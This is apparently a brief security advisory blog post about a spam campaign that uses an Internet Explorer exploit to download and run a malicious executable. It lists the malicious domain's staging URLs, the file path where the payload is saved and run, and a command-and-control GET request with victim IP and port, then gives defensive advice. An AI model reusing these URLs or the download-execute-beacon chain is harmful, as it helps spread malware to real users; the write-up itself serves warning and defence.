Malware Spam!

We have noticed that spam-mails are being hurled out of a number of servers in Brazil. When downloaded, they run the below exploit code in IE from a server in China:

alobhyundajacoupe.com/scr2/cmd.txt

which refers to

alobhyundajacoupe.com/scr2/cmd2.txt


This then retrieves the file

alobhyundajacoupe.com/scr2/key.exe

which is saved as C:malware.exe - this is then executed.

The below http request to blahot.com is then made:

GET /scr2/command.php?IP=10.xx.xx.xx&Port1=43750&ID= 001300012005000200580044 HTTP/1.1 User-Agent: Host: blahot.com

I'm currently trying to get my hands of some of the files, but for now more info can be found over at bleedingsnort.org who have already created some signature files and SANS.org, who are currently in the process of trying to shut these boxes down.

Now that this technique is out in the wild, it's sure to be picked up on by all and sundry, so it's even more essential that you don't open (or even click on) an email from someone you don't know. And if you use a mail client, make sure you're using one that doesn't allow code to be executed such as Thunderbird. Just in case the last email showing in the client is an infected one!